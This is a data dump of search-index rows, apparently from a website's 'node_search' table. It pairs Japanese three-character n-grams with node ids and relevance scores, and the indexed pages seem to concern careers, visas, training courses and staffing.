('エージ', 180, 'ja', 'node_search', 1),
('エージ', 184, 'ja', 'node_search', 1),
('エージ', 185, 'ja', 'node_search', 1),
('エージ', 186, 'ja', 'node_search', 1.92027),
('エージ', 187, 'ja', 'node_search', 1),
('エージ', 188, 'ja', 'node_search', 1),
('エージ', 189, 'ja', 'node_search', 1),
('エージ', 190, 'ja', 'node_search', 1),
('エージ', 191, 'ja', 'node_search', 1),
('エージ', 192, 'ja', 'node_search', 1),
('エージ', 193, 'ja', 'node_search', 1),
('エージ', 194, 'ja', 'node_search', 1),
('エージ', 195, 'ja', 'node_search', 1),
('エージ', 196, 'ja', 'node_search', 1),
('エージ', 197, 'ja', 'node_search', 1),
('エージ', 198, 'ja', 'node_search', 1),
('エージ', 199, 'ja', 'node_search', 1),
('エーヤ', 27, 'ja', 'node_search', 1.65755),
('ォンコ', 27, 'ja', 'node_search', 5.29478),
('オを通', 135, 'ja', 'node_search', 0.931053),
('オフィ', 5, 'ja', 'node_search', 0.886095),
('オフィ', 7, 'ja', 'node_search', 1.8861),
('オペレ', 30, 'ja', 'node_search', 1),
('オート', 27, 'ja', 'node_search', 5.16839),
('カイゴ', 126, 'ja', 'node_search', 1),
('カスタ', 62, 'ja', 'node_search', 4),
('カテゴ', 7, 'ja', 'node_search', 1.8861),
('カリキ', 142, 'ja', 'node_search', 0.659351),
('カレッ', 10, 'ja', 'node_search', 1),
('カーが', 138, 'ja', 'node_search', 0.810915),
('カーと', 136, 'ja', 'node_search', 1),
('カーの', 136, 'ja', 'node_search', 0.745294),
('カード', 3, 'ja', 'node_search', 1),
('ガイン', 24, 'ja', 'node_search', 0.350467),
('ガイン', 27, 'ja', 'node_search', 2.5567),
('ガポー', 5, 'ja', 'node_search', 29),
('ガポー', 23, 'ja', 'node_search', 0.529288),
('ガポー', 24, 'ja', 'node_search', 0.571798),
('ガポー', 30, 'ja', 'node_search', 28),
('ガレ工', 27, 'ja', 'node_search', 0.355508),
('キッチ', 135, 'ja', 'node_search', 1),
('キャリ', 154, 'ja', 'node_search', 1),
('キャリ', 156, 'ja', 'node_search', 1),
('キャリ', 157, 'ja', 'node_search', 0.927431),
('キャリ', 160, 'ja', 'node_search', 4),
('キャリ', 161, 'ja', 'node_search', 1),
('キャリ', 162, 'ja', 'node_search', 1.68961),
('キャリ', 163, 'ja', 'node_search', 1),
('キャリ', 164, 'ja', 'node_search', 1),
('キャリ', 165, 'ja', 'node_search', 1),
('キャリ', 166, 'ja', 'node_search', 0.851346),
('キャリ', 167, 'ja', 'node_search', 1),
('キャリ', 168, 'ja', 'node_search', 0.827757),
('キャリ', 169, 'ja', 'node_search', 1),
('キャリ', 170, 'ja', 'node_search', 0.810915),
('キャリ', 171, 'ja', 'node_search', 1),
('キャリ', 173, 'ja', 'node_search', 27.9769),
('キャリ', 174, 'ja', 'node_search', 1),
('キャリ', 175, 'ja', 'node_search', 1),
('キャリ', 176, 'ja', 'node_search', 1),
('キャリ', 177, 'ja', 'node_search', 1),
('キャリ', 178, 'ja', 'node_search', 1),
('キャリ', 180, 'ja', 'node_search', 0.980874),
('キャリ', 184, 'ja', 'node_search', 0.920273),
('キャリ', 185, 'ja', 'node_search', 1),
('キャリ', 186, 'ja', 'node_search', 1),
('キャリ', 187, 'ja', 'node_search', 1),
('キャリ', 189, 'ja', 'node_search', 0.802752),
('キャリ', 193, 'ja', 'node_search', 1),
('キャリ', 196, 'ja', 'node_search', 0.934703),
('キャリ', 198, 'ja', 'node_search', 1),
('キュラ', 142, 'ja', 'node_search', 0.655756),
('キルと', 138, 'ja', 'node_search', 0.942091),
('キルを', 24, 'ja', 'node_search', 0.422736),
('キルを', 116, 'ja', 'node_search', 1),
('キルを', 135, 'ja', 'node_search', 0.866793),
('キルを', 140, 'ja', 'node_search', 0.906287),
('キルテ', 19, 'ja', 'node_search', 3),
('キル向', 198, 'ja', 'node_search', 0.957226),
('キング', 138, 'ja', 'node_search', 19.9458),
('ギの栽', 163, 'ja', 'node_search', 0.949597),
('クで仕', 24, 'ja', 'node_search', 0.50505),
('クを扱', 133, 'ja', 'node_search', 0.993146),
('クイズ', 142, 'ja', 'node_search', 0.976851),
('クショ', 27, 'ja', 'node_search', 24.7017),
('クスを', 3, 'ja', 'node_search', 1),
('クセン', 138, 'ja', 'node_search', 0.78951),
('クター', 135, 'ja', 'node_search', 1),
('クター', 136, 'ja', 'node_search', 1),
('クティ', 5, 'ja', 'node_search', 0.800068),
('クテイ', 126, 'ja', 'node_search', 1),
('クトが', 27, 'ja', 'node_search', 0.466323),
('クトに', 27, 'ja', 'node_search', 0.827236),
('クトは', 27, 'ja', 'node_search', 0.373259),
('クトを', 27, 'ja', 'node_search', 0.405928),
('クト協', 27, 'ja', 'node_search', 0.7017),
('クパー', 30, 'ja', 'node_search', 0.909743),
('クビザ', 23, 'ja', 'node_search', 0.450806),
('クビザ', 24, 'ja', 'node_search', 0.691597),
('クライ', 25, 'ja', 'node_search', 2),
('クライ', 27, 'ja', 'node_search', 0.419836),
('クラス', 3, 'ja', 'node_search', 43),
('クラス', 24, 'ja', 'node_search', 1.17956),
('クラス', 62, 'ja', 'node_search', 36.3964),
('クラス', 133, 'ja', 'node_search', 20.9458),
('クラス', 136, 'ja', 'node_search', 19),
('クラス', 138, 'ja', 'node_search', 1.74996),
('クラス', 140, 'ja', 'node_search', 1.9347),
('クラス', 142, 'ja', 'node_search', 1),
('クラス', 155, 'ja', 'node_search', 33),
('ク造船', 9, 'ja', 'node_search', 3),
('ク造船', 17, 'ja', 'node_search', 4),
('グでで', 24, 'ja', 'node_search', 0.530446),
('グと実', 138, 'ja', 'node_search', 19),
('グと準', 133, 'ja', 'node_search', 0.747619),
('グなど', 30, 'ja', 'node_search', 1.82727),
('グのシ', 135, 'ja', 'node_search', 0.949597),
('グを提', 136, 'ja', 'node_search', 1),
('グクラ', 24, 'ja', 'node_search', 0.363357),
('グビザ', 24, 'ja', 'node_search', 0.384933),
('グビザ', 62, 'ja', 'node_search', 0.722831),
('グラム', 179, 'ja', 'node_search', 1),
('グルー', 23, 'ja', 'node_search', 1.75707),
('グルー', 27, 'ja', 'node_search', 1),
('グルー', 135, 'ja', 'node_search', 1),
('グルー', 138, 'ja', 'node_search', 1),
('グ校と', 24, 'ja', 'node_search', 0.37157),
('グ海外', 23, 'ja', 'node_search', 2.0823),
('グ海外', 24, 'ja', 'node_search', 1.46543),
('ケジュ', 62, 'ja', 'node_search', 1.19713),
('ケット', 133, 'ja', 'node_search', 1),
('ケーシ', 18, 'ja', 'node_search', 1),
('ケーシ', 24, 'ja', 'node_search', 0.413458),
('ケース', 3, 'ja', 'node_search', 0.563797),
('ゲージ', 155, 'ja', 'node_search', 1),
('コスト', 27, 'ja', 'node_search', 0.433216),
('コミュ', 10, 'ja', 'node_search', 1),
('コミュ', 18, 'ja', 'node_search', 1),
('コミュ', 24, 'ja', 'node_search', 0.416268),
('コメッ', 9, 'ja', 'node_search', 28),
('コメッ', 11, 'ja', 'node_search', 19),
('コメッ', 17, 'ja', 'node_search', 30),
('コメッ', 19, 'ja', 'node_search', 1),
('コメッ', 23, 'ja', 'node_search', 4.83461),
('コメッ', 24, 'ja', 'node_search', 1.46543),
('コメッ', 27, 'ja', 'node_search', 20.3541),
('コメッ', 133, 'ja', 'node_search', 1.56074),
('コメッ', 135, 'ja', 'node_search', 2.41121),
('コメッ', 136, 'ja', 'node_search', 1.6916),
('コメッ', 138, 'ja', 'node_search', 2),
('コメッ', 142, 'ja', 'node_search', 19),
('コメッ', 154, 'ja', 'node_search', 1.84832),
('コメッ', 155, 'ja', 'node_search', 1),
('コメッ', 160, 'ja', 'node_search', 1.83938),
('コメッ', 161, 'ja', 'node_search', 1.8861),
('コメッ', 162, 'ja', 'node_search', 1.63167),
('コメッ', 163, 'ja', 'node_search', 1),
('コメッ', 164, 'ja', 'node_search', 1.81367),
('コメッ', 165, 'ja', 'node_search', 1.80545),
('コメッ', 166, 'ja', 'node_search', 1),
('コメッ', 167, 'ja', 'node_search', 1.88282),
('コメッ', 168, 'ja', 'node_search', 1),
('コメッ', 169, 'ja', 'node_search', 1),
('コメッ', 170, 'ja', 'node_search', 1),
('コメッ', 171, 'ja', 'node_search', 1),
('コメッ', 173, 'ja', 'node_search', 1.8249),
('コメッ', 174, 'ja', 'node_search', 1.77419),
('コメッ', 175, 'ja', 'node_search', 1.83353),
('コメッ', 176, 'ja', 'node_search', 1.80007),
('コメッ', 177, 'ja', 'node_search', 1),
('コメッ', 178, 'ja', 'node_search', 1),
('コメッ', 179, 'ja', 'node_search', 1.96109),
('コメッ', 180, 'ja', 'node_search', 1),
('コメッ', 181, 'ja', 'node_search', 1.7974),
('コメッ', 182, 'ja', 'node_search', 4.2327),
('コメッ', 183, 'ja', 'node_search', 3.98118),
('コメッ', 184, 'ja', 'node_search', 1),
('コメッ', 185, 'ja', 'node_search', 1),
('コメッ', 186, 'ja', 'node_search', 1.92027),
('コメッ', 187, 'ja', 'node_search', 1),
('コメッ', 188, 'ja', 'node_search', 1),
('コメッ', 189, 'ja', 'node_search', 1),
('コメッ', 190, 'ja', 'node_search', 1),
('コメッ', 191, 'ja', 'node_search', 1),
('コメッ', 192, 'ja', 'node_search', 1),
('コメッ', 193, 'ja', 'node_search', 1),
('コメッ', 194, 'ja', 'node_search', 1),
('コメッ', 195, 'ja', 'node_search', 1),
('コメッ', 196, 'ja', 'node_search', 1),
('コメッ', 197, 'ja', 'node_search', 1),
('コメッ', 198, 'ja', 'node_search', 1),
('コメッ', 199, 'ja', 'node_search', 1),
('コメッ', 200, 'ja', 'node_search', 1),
('コンサ', 27, 'ja', 'node_search', 0.617112),
('コンス', 27, 'ja', 'node_search', 24.7017),
('コント', 24, 'ja', 'node_search', 0.538701),
('コンピ', 24, 'ja', 'node_search', 0.382539),
('コンピ', 30, 'ja', 'node_search', 1.84234),
('コース', 28, 'ja', 'node_search', 6),
('コース', 62, 'ja', 'node_search', 5.85204),
('コース', 136, 'ja', 'node_search', 0.816452),
('コース', 142, 'ja', 'node_search', 0.860547),
('コース', 155, 'ja', 'node_search', 5.53356),
('コーデ', 30, 'ja', 'node_search', 1),
('ゴの子', 126, 'ja', 'node_search', 1),
('ゴリー', 7, 'ja', 'node_search', 1.8861),
('ゴンの', 95, 'ja', 'node_search', 1),
('ゴンテ', 27, 'ja', 'node_search', 0.731649),
('ゴン地', 27, 'ja', 'node_search', 1),
('サイト', 1, 'ja', 'node_search', 54),
('サガイ', 24, 'ja', 'node_search', 0.350964),
('サビー', 24, 'ja', 'node_search', 0.49376),
('サポー', 1, 'ja', 'node_search', 0.976851),
('サポー', 5, 'ja', 'node_search', 0.836446),
('サポー', 23, 'ja', 'node_search', 0.519091),
('サポー', 30, 'ja', 'node_search', 0.882818),
('サポー', 62, 'ja', 'node_search', 1.67273),
('サポー', 80, 'ja', 'node_search', 1),
('サポー', 135, 'ja', 'node_search', 0.72066),
('サポー', 138, 'ja', 'node_search', 0.668514),
('サポー', 162, 'ja', 'node_search', 1.67023),
('サポー', 186, 'ja', 'node_search', 0.860547),
('サルタ', 27, 'ja', 'node_search', 0.613969),
('サルー', 27, 'ja', 'node_search', 0.329489),
('サービ', 1, 'ja', 'node_search', 1),
('サービ', 7, 'ja', 'node_search', 1.8861),
('サービ', 23, 'ja', 'node_search', 2),
('サービ', 24, 'ja', 'node_search', 1.34026),
('サービ', 27, 'ja', 'node_search', 5.56706),
('サービ', 68, 'ja', 'node_search', 1),
('サービ', 162, 'ja', 'node_search', 0.830633),
('ザであ', 7, 'ja', 'node_search', 1.8861),
('ザであ', 24, 'ja', 'node_search', 0.687638),
('ザです', 7, 'ja', 'node_search', 7.64322),
('ザでミ', 126, 'ja', 'node_search', 1),
('ザで日', 24, 'ja', 'node_search', 0.389816),
('ザで韓', 3, 'ja', 'node_search', 0.766757),
('ザなど', 24, 'ja', 'node_search', 0.650439),
('ザにつ', 3, 'ja', 'node_search', 2.89132),
('ザの貴', 62, 'ja', 'node_search', 0.705825),
('ザは外', 7, 'ja', 'node_search', 28.8861),
('ザは溶', 3, 'ja', 'node_search', 0.705825),
('ザや研', 23, 'ja', 'node_search', 0.449147),
('ザを取', 23, 'ja', 'node_search', 0.445053),
('ザを取', 111, 'ja', 'node_search', 1),
('ザを持', 6, 'ja', 'node_search', 28),
('ザイン', 27, 'ja', 'node_search', 0.775803),
('ザガイ', 27, 'ja', 'node_search', 2.56086),
('ザポジ', 19, 'ja', 'node_search', 3),
('ザ保持', 3, 'ja', 'node_search', 1.21016),
('シェピ', 23, 'ja', 'node_search', 0.736141),
('シスタ', 30, 'ja', 'node_search', 0.866793),
('シップ', 116, 'ja', 'node_search', 20),
('シップ', 120, 'ja', 'node_search', 1),
('シップ', 122, 'ja', 'node_search', 2),
('シナリ', 135, 'ja', 'node_search', 0.942091),
('シフト', 162, 'ja', 'node_search', 0.699655),
('シフト', 163, 'ja', 'node_search', 0.78951),
('シュエ', 27, 'ja', 'node_search', 6.55554),
('ショナ', 116, 'ja', 'node_search', 1),
('ション', 5, 'ja', 'node_search', 3),
('ション', 10, 'ja', 'node_search', 3),
('ション', 18, 'ja', 'node_search', 1),
('ション', 19, 'ja', 'node_search', 3),
('ション', 24, 'ja', 'node_search', 0.412068),
('ション', 25, 'ja', 'node_search', 34),
('ション', 27, 'ja', 'node_search', 20.5826),
('ション', 30, 'ja', 'node_search', 1),
('ション', 120, 'ja', 'node_search', 0.957226),
('ション', 142, 'ja', 'node_search', 0.96498),
('シンガ', 5, 'ja', 'node_search', 29),
('シンガ', 23, 'ja', 'node_search', 0.53161),
('シンガ', 24, 'ja', 'node_search', 0.574516),
('シンガ', 30, 'ja', 'node_search', 28),
('シンマ', 9, 'ja', 'node_search', 3),
('シンマ', 17, 'ja', 'node_search', 4),
('シンマ', 23, 'ja', 'node_search', 0.588512),
('シンマ', 24, 'ja', 'node_search', 1),
('シーで', 23, 'ja', 'node_search', 0.645209),
('シーで', 24, 'ja', 'node_search', 1),
('シーで', 135, 'ja', 'node_search', 1),
('シーで', 136, 'ja', 'node_search', 1),
('シーで', 138, 'ja', 'node_search', 1),
('シーで', 162, 'ja', 'node_search', 1),
('シーで', 163, 'ja', 'node_search', 1),
('シーは', 23, 'ja', 'node_search', 0.43709),
('シーは', 24, 'ja', 'node_search', 0.465433),
('シーは', 135, 'ja', 'node_search', 0.729424),
('シーは', 136, 'ja', 'node_search', 0.691597),
('シーは', 154, 'ja', 'node_search', 1.84832),
('シーは', 160, 'ja', 'node_search', 1.83938),
('シーは', 161, 'ja', 'node_search', 1.8861),
('シーは', 164, 'ja', 'node_search', 1.81367),
('シーは', 165, 'ja', 'node_search', 1.80545),
('シーは', 166, 'ja', 'node_search', 1),
('シーは', 167, 'ja', 'node_search', 1.88282),
('シーは', 168, 'ja', 'node_search', 1),
('シーは', 169, 'ja', 'node_search', 1),
('シーは', 170, 'ja', 'node_search', 1),
('シーは', 171, 'ja', 'node_search', 1),
('シーは', 173, 'ja', 'node_search', 1.8249),
('シーは', 174, 'ja', 'node_search', 1.77419),
('シーは', 175, 'ja', 'node_search', 1.83353),
('シーは', 176, 'ja', 'node_search', 1.80007),
('シーは', 177, 'ja', 'node_search', 1),
('シーは', 178, 'ja', 'node_search', 1),
('シーは', 179, 'ja', 'node_search', 1.96109),
('シーは', 180, 'ja', 'node_search', 1),
('シーは', 184, 'ja', 'node_search', 1),
('シーは', 185, 'ja', 'node_search', 1),
('シーは', 186, 'ja', 'node_search', 1.92027),
('シーは', 187, 'ja', 'node_search', 1),
('シーは', 188, 'ja', 'node_search', 1),
('シーは', 189, 'ja', 'node_search', 1),
('シーは', 190, 'ja', 'node_search', 1),
('シーは', 191, 'ja', 'node_search', 1),
('シーは', 192, 'ja', 'node_search', 1),
('シーは', 193, 'ja', 'node_search', 1),
('シーは', 194, 'ja', 'node_search', 1),
('シーは', 195, 'ja', 'node_search', 1),
('シーは', 196, 'ja', 'node_search', 1),
('シーは', 197, 'ja', 'node_search', 1),
('シーは', 198, 'ja', 'node_search', 1),
('シーは', 199, 'ja', 'node_search', 1),
('シーま', 162, 'ja', 'node_search', 0.63167),
('シーを', 23, 'ja', 'node_search', 1),
('シーを', 135, 'ja', 'node_search', 0.681785),
('シーム', 135, 'ja', 'node_search', 0.707906),
('ジのメ', 155, 'ja', 'node_search', 0.674137),
('ジの学', 10, 'ja', 'node_search', 1),
('ジへ進', 185, 'ja', 'node_search', 1),
('ジェク', 27, 'ja', 'node_search', 3.50552),
('ジェク', 30, 'ja', 'node_search', 1),
('ジェン', 11, 'ja', 'node_search', 19),
('ジェン', 17, 'ja', 'node_search', 1),
('ジェン', 19, 'ja', 'node_search', 1),
('ジェン', 23, 'ja', 'node_search', 2.0823),
('ジェン', 24, 'ja', 'node_search', 1.46543),
('ジェン', 27, 'ja', 'node_search', 1),
('ジェン', 135, 'ja', 'node_search', 2.41121),
('ジェン', 136, 'ja', 'node_search', 1.6916),
('ジェン', 138, 'ja', 'node_search', 1),
('ジェン', 154, 'ja', 'node_search', 1.84832),
('ジェン', 160, 'ja', 'node_search', 1.83938),
('ジェン', 161, 'ja', 'node_search', 1.8861),
('ジェン', 162, 'ja', 'node_search', 1.63167),
('ジェン', 163, 'ja', 'node_search', 1),
('ジェン', 164, 'ja', 'node_search', 1.81367),
('ジェン', 165, 'ja', 'node_search', 1.80545),
('ジェン', 166, 'ja', 'node_search', 1),
('ジェン', 167, 'ja', 'node_search', 1.88282),
('ジェン', 168, 'ja', 'node_search', 1),
('ジェン', 169, 'ja', 'node_search', 1),
('ジェン', 170, 'ja', 'node_search', 1),
('ジェン', 171, 'ja', 'node_search', 1),
('ジェン', 173, 'ja', 'node_search', 1.8249),
('ジェン', 174, 'ja', 'node_search', 1.77419),
('ジェン', 175, 'ja', 'node_search', 1.83353),
('ジェン', 176, 'ja', 'node_search', 1.80007),
('ジェン', 177, 'ja', 'node_search', 1),
('ジェン', 178, 'ja', 'node_search', 1),
('ジェン', 179, 'ja', 'node_search', 1.96109),
('ジェン', 180, 'ja', 'node_search', 1),
('ジェン', 184, 'ja', 'node_search', 1),
('ジェン', 185, 'ja', 'node_search', 1),
('ジェン', 186, 'ja', 'node_search', 1.92027),
('ジェン', 187, 'ja', 'node_search', 1),
('ジェン', 188, 'ja', 'node_search', 1),
('ジェン', 189, 'ja', 'node_search', 1),
('ジェン', 190, 'ja', 'node_search', 1),
('ジェン', 191, 'ja', 'node_search', 1),
('ジェン', 192, 'ja', 'node_search', 1),
('ジェン', 193, 'ja', 'node_search', 1),
('ジェン', 194, 'ja', 'node_search', 1),
('ジェン', 195, 'ja', 'node_search', 1),
('ジェン', 196, 'ja', 'node_search', 1),
('ジェン', 197, 'ja', 'node_search', 1),
('ジェン', 198, 'ja', 'node_search', 1),
('ジェン', 199, 'ja', 'node_search', 1),
('ジショ', 5, 'ja', 'node_search', 3),
('ジショ', 10, 'ja', 'node_search', 3),
('ジショ', 19, 'ja', 'node_search', 3),
('ジセン', 155, 'ja', 'node_search', 1),
('ジニア', 10, 'ja', 'node_search', 32),
('ジニア', 24, 'ja', 'node_search', 0.679856),
('ジネス', 24, 'ja', 'node_search', 0.433985),
('ジネス', 62, 'ja', 'node_search', 0.539902),
('ジネス', 87, 'ja', 'node_search', 0.657549),
('ジホス', 18, 'ja', 'node_search', 3),
('ジャー', 155, 'ja', 'node_search', 0.662985),
('ジュー', 62, 'ja', 'node_search', 1.19547),
('スがお', 62, 'ja', 'node_search', 4),
('スが本', 133, 'ja', 'node_search', 0.942091),
('スでは', 133, 'ja', 'node_search', 1),
('スでは', 155, 'ja', 'node_search', 1),
('スとサ', 27, 'ja', 'node_search', 5.16839),
('スと日', 28, 'ja', 'node_search', 3),
('スな体', 135, 'ja', 'node_search', 0.699655),
('スには', 3, 'ja', 'node_search', 43),
('スの一', 162, 'ja', 'node_search', 0.822065),
('スの仕', 7, 'ja', 'node_search', 1.8861),
('スの受', 62, 'ja', 'node_search', 29),
('スの導', 142, 'ja', 'node_search', 1),
('スの提', 23, 'ja', 'node_search', 1),
('スの教', 28, 'ja', 'node_search', 3),
('スの詳', 62, 'ja', 'node_search', 2.58777),
('スは以', 155, 'ja', 'node_search', 0.792123),
('スへの', 187, 'ja', 'node_search', 0.980874),
('スもあ', 3, 'ja', 'node_search', 0.561181),
('スも自', 87, 'ja', 'node_search', 0.653974),
('スや様', 23, 'ja', 'node_search', 0.882818),
('スや機', 1, 'ja', 'node_search', 1),
('スをし', 24, 'ja', 'node_search', 0.490769),
('スをし', 120, 'ja', 'node_search', 1),
('スを修', 142, 'ja', 'node_search', 0.854391),
('スを手', 3, 'ja', 'node_search', 1),
('スを手', 194, 'ja', 'node_search', 1),
('スを掴', 24, 'ja', 'node_search', 0.497805),
('スを掴', 62, 'ja', 'node_search', 4),
('スを提', 23, 'ja', 'node_search', 0.420557),
('スを提', 24, 'ja', 'node_search', 0.36229),
('スを提', 138, 'ja', 'node_search', 0.747619),
('スを緊', 18, 'ja', 'node_search', 3),
('スを開', 155, 'ja', 'node_search', 1),
('スキル', 19, 'ja', 'node_search', 3),
('スキル', 24, 'ja', 'node_search', 0.423467),
('スキル', 116, 'ja', 'node_search', 1),
('スキル', 135, 'ja', 'node_search', 0.869951),
('スキル', 138, 'ja', 'node_search', 0.945829),
('スキル', 140, 'ja', 'node_search', 0.909743),
('スキル', 198, 'ja', 'node_search', 0.961087),
('スケジ', 62, 'ja', 'node_search', 1.1988),
('スタイ', 120, 'ja', 'node_search', 1),
('スタッ', 156, 'ja', 'node_search', 1),
('スタッ', 157, 'ja', 'node_search', 0.886095),
('スタッ', 162, 'ja', 'node_search', 31),
('スタッ', 163, 'ja', 'node_search', 27),
('スタマ', 62, 'ja', 'node_search', 4),
('スタン', 25, 'ja', 'node_search', 1),
('スタン', 26, 'ja', 'node_search', 1),
('スタン', 30, 'ja', 'node_search', 0.863659),
('スター', 24, 'ja', 'node_search', 0.397382),
('スター', 62, 'ja', 'node_search', 3.65375),
('スター', 154, 'ja', 'node_search', 1),
('スター', 164, 'ja', 'node_search', 5),
('スター', 167, 'ja', 'node_search', 1),
('スター', 169, 'ja', 'node_search', 1),
('スター', 171, 'ja', 'node_search', 1),
('スター', 173, 'ja', 'node_search', 0.96498),
('スター', 174, 'ja', 'node_search', 28),
('スター', 176, 'ja', 'node_search', 1),
('スター', 177, 'ja', 'node_search', 1),
('スター', 196, 'ja', 'node_search', 0.913226),
('ステス', 18, 'ja', 'node_search', 3),
('ステッ', 182, 'ja', 'node_search', 0.934703),
('ステー', 185, 'ja', 'node_search', 1),
('ストの', 19, 'ja', 'node_search', 3),
('ストラ', 24, 'ja', 'node_search', 0.600219),
('ストラ', 27, 'ja', 'node_search', 24.7017),
('ストラ', 68, 'ja', 'node_search', 1),
('ストラ', 70, 'ja', 'node_search', 1),
('ストラ', 71, 'ja', 'node_search', 1),
('ストラ', 72, 'ja', 'node_search', 1),
('ストラ', 73, 'ja', 'node_search', 1),
('ストラ', 74, 'ja', 'node_search', 1),
('ストラ', 75, 'ja', 'node_search', 1),
('ストラ', 77, 'ja', 'node_search', 4),
('ストラ', 81, 'ja', 'node_search', 4),
('ストラ', 82, 'ja', 'node_search', 1),
('ストラ', 84, 'ja', 'node_search', 1),
('ストラ', 90, 'ja', 'node_search', 1),
('ストラ', 95, 'ja', 'node_search', 1),
('ストラ', 98, 'ja', 'node_search', 19),
('ストラ', 100, 'ja', 'node_search', 4),
('ストラ', 104, 'ja', 'node_search', 7),
('ストラ', 106, 'ja', 'node_search', 1),
('ストラ', 107, 'ja', 'node_search', 1),
('ストラ', 109, 'ja', 'node_search', 1),
('ストラ', 110, 'ja', 'node_search', 1),
('ストラ', 112, 'ja', 'node_search', 1),
('ストラ', 114, 'ja', 'node_search', 1),
('ストラ', 116, 'ja', 'node_search', 19),
('ストラ', 117, 'ja', 'node_search', 1),
('ストラ', 118, 'ja', 'node_search', 1),
('ストラ', 119, 'ja', 'node_search', 1),
('ストラ', 122, 'ja', 'node_search', 19),
('ストラ', 123, 'ja', 'node_search', 1),
('ストラ', 125, 'ja', 'node_search', 1),
('ストラ', 131, 'ja', 'node_search', 1),
('ストラ', 133, 'ja', 'node_search', 1),
('ストラ', 135, 'ja', 'node_search', 2.77419),
('ストラ', 136, 'ja', 'node_search', 2),
('ストラ', 138, 'ja', 'node_search', 1),
('ストラ', 140, 'ja', 'node_search', 1),
('ストラ', 143, 'ja', 'node_search', 1),
('ストラ', 144, 'ja', 'node_search', 1),
('スト削', 27, 'ja', 'node_search', 0.43245),
('スピタ', 155, 'ja', 'node_search', 0.742984),
('スピー', 9, 'ja', 'node_search', 3),
('スピー', 17, 'ja', 'node_search', 4),
('スピー', 62, 'ja', 'node_search', 1.15735),
('スピー', 136, 'ja', 'node_search', 1.74529),
('スピー', 138, 'ja', 'node_search', 20.7623),
('スポー', 5, 'ja', 'node_search', 28),
('スポー', 24, 'ja', 'node_search', 0.873132),
('スマー', 87, 'ja', 'node_search', 0.899454),
('スンは', 122, 'ja', 'node_search', 0.993146),
('スンを', 142, 'ja', 'node_search', 1),
('ス修了', 62, 'ja', 'node_search', 0.685676),
('ス修了', 136, 'ja', 'node_search', 0.810915),
('ス修了', 138, 'ja', 'node_search', 1),
('ス教材', 62, 'ja', 'node_search', 1.1629),
('ス株式', 23, 'ja', 'node_search', 1),
('ス株式', 27, 'ja', 'node_search', 2.00072),
('ス業に', 7, 'ja', 'node_search', 1.8861),
('ス概要', 155, 'ja', 'node_search', 3.72421),
('ス終了', 133, 'ja', 'node_search', 19),
('ス表現', 24, 'ja', 'node_search', 0.43245),
('ス開講', 155, 'ja', 'node_search', 27),
('ズされ', 62, 'ja', 'node_search', 4),
('セッシ', 142, 'ja', 'node_search', 0.972861),
('センジ', 155, 'ja', 'node_search', 0.66666),
('センタ', 62, 'ja', 'node_search', 1.27439),
('センタ', 142, 'ja', 'node_search', 19),
('センタ', 155, 'ja', 'node_search', 1),
('セント', 138, 'ja', 'node_search', 0.786915),
('セール', 27, 'ja', 'node_search', 5.16839),
('ゼッヤ', 23, 'ja', 'node_search', 0.742984),
('ゼヤー', 27, 'ja', 'node_search', 11.745),
('ゼーヤ', 23, 'ja', 'node_search', 1),
('ソコン', 24, 'ja', 'node_search', 0.539902),
('ソリュ', 27, 'ja', 'node_search', 0.429413),
('ゾート', 155, 'ja', 'node_search', 1),
('タイプ', 163, 'ja', 'node_search', 0.757065),
('タイル', 120, 'ja', 'node_search', 1),
('タイ語', 24, 'ja', 'node_search', 0.889397),
('タゴン', 27, 'ja', 'node_search', 0.733888),
('タッフ', 156, 'ja', 'node_search', 1),
('タッフ', 157, 'ja', 'node_search', 0.882818),
('タッフ', 162, 'ja', 'node_search', 31),
('タッフ', 163, 'ja', 'node_search', 27),
('タマイ', 62, 'ja', 'node_search', 4),
('タリテ', 155, 'ja', 'node_search', 0.738408),
('タンダ', 25, 'ja', 'node_search', 1),
('タンダ', 26, 'ja', 'node_search', 1),
('タント', 27, 'ja', 'node_search', 0.610858),
('タント', 30, 'ja', 'node_search', 0.860547),
('ターが', 135, 'ja', 'node_search', 1),
('ターし', 24, 'ja', 'node_search', 0.39674),
('ターす', 62, 'ja', 'node_search', 0.842342),
('ターで', 155, 'ja', 'node_search', 1),
('ターの', 62, 'ja', 'node_search', 0.512513),
('ターの', 136, 'ja', 'node_search', 1),
('ターの', 142, 'ja', 'node_search', 19),
('ターは', 62, 'ja', 'node_search', 0.757065),
('ターを', 30, 'ja', 'node_search', 1.84234),
('タート', 154, 'ja', 'node_search', 1),
('タート', 164, 'ja', 'node_search', 5),
('タート', 167, 'ja', 'node_search', 1),
('タート', 169, 'ja', 'node_search', 1),
('タート', 171, 'ja', 'node_search', 1),
('タート', 173, 'ja', 'node_search', 0.961087),
('タート', 174, 'ja', 'node_search', 28),
('タート', 176, 'ja', 'node_search', 1),
('タート', 177, 'ja', 'node_search', 1),
('タート', 196, 'ja', 'node_search', 0.909743),
('ターン', 116, 'ja', 'node_search', 20),
('ターン', 122, 'ja', 'node_search', 20),
('ター学', 24, 'ja', 'node_search', 0.379588),
('ター文', 62, 'ja', 'node_search', 0.552215),
('ター聴', 62, 'ja', 'node_search', 1.12673),
('ター読', 62, 'ja', 'node_search', 1.12948),
('タ入力', 30, 'ja', 'node_search', 1.84234),
('ダナポ', 27, 'ja', 'node_search', 0.369343),
('ダビの', 18, 'ja', 'node_search', 28),
('ダレー', 27, 'ja', 'node_search', 1.34675),
('ダーシ', 120, 'ja', 'node_search', 1),
('ダード', 25, 'ja', 'node_search', 1),
('ダード', 26, 'ja', 'node_search', 1),
('チから', 19, 'ja', 'node_search', 28),
('チでは', 136, 'ja', 'node_search', 1),
('チによ', 138, 'ja', 'node_search', 1),
('チのス', 138, 'ja', 'node_search', 19),
('チの初', 133, 'ja', 'node_search', 0.961087),
('チの学', 95, 'ja', 'node_search', 1),
('チを行', 9, 'ja', 'node_search', 3),
('チを行', 17, 'ja', 'node_search', 4),
('チェタ', 27, 'ja', 'node_search', 0.738408),
('チケッ', 133, 'ja', 'node_search', 1),
('チベー', 120, 'ja', 'node_search', 0.968904),
('チャッ', 3, 'ja', 'node_search', 1),
('チャレ', 62, 'ja', 'node_search', 0.587082),
('チャン', 23, 'ja', 'node_search', 0.422736),
('チャン', 24, 'ja', 'node_search', 0.500884),
('チャン', 62, 'ja', 'node_search', 4),
('チャン', 187, 'ja', 'node_search', 0.993146),
('チャン', 194, 'ja', 'node_search', 1),
('チンで', 135, 'ja', 'node_search', 0.993146),
('チンを', 142, 'ja', 'node_search', 0.679856),
('チ実習', 133, 'ja', 'node_search', 19),
('チ理論', 140, 'ja', 'node_search', 19),
